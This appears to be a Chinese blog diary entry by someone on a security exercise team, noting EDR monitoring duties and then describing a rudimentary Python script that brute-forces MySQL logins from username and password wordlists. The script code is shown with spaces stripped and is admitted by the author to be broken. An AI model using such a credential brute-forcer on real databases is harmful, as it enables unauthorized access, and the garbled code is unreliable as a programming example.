2019-07-29

护网 日常登入EDR等网站查看主机是否上线漏洞威胁等

几日已到规定工作日,为在EDR上出现的主机地址,通知相关人员对未上线的地址进行封堵

python爆破数据库

爆破脚本大概代码 根据需求进行整改:https://www.jb51.net/article/94868.htm

sys.argv[x]的用法是:https://www.cnblogs.com/aland-1415/p/6613449.html

从网址中我们可以了解到基本的用法

输入  mysql.py username.txt password.txt localhost 3306

其中sys.argv[0]为第一个字符串 也就是mysql.py

以下代码为

mysql_username = open(sys.argv[1],mode='r')

common_weak_password =open(sys.argv[2],mode='r')

分别是读取1.2的文件也就是 username.txt password.txt

host = sys.argv[3]

port = sys.argv[4]

这里3.4 就是上述命令中的localhost 3306的

然后执行循环语句

因为脚本中的循环语句有问题 正确的循环语句还在学习中

forusername inmysql_username:

  forpassword incommon_weak_password:

    try:

      db =MySQLdb.connect(host, username, password)

      success =True

      ifsuccess:

        printusername, password

    exceptException, e:

      pass

这是可以查询到的循环语句需要整改

注意:python对空格有着严格的要求不能随意按否则会脚本运行错误


mysql_username = open(sys.argv[1],mode='r')

common_weak_password =open(sys.argv[2],mode='r')

这是读取username.txt password.txt 后的值将他输出起来感觉有点奇怪

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容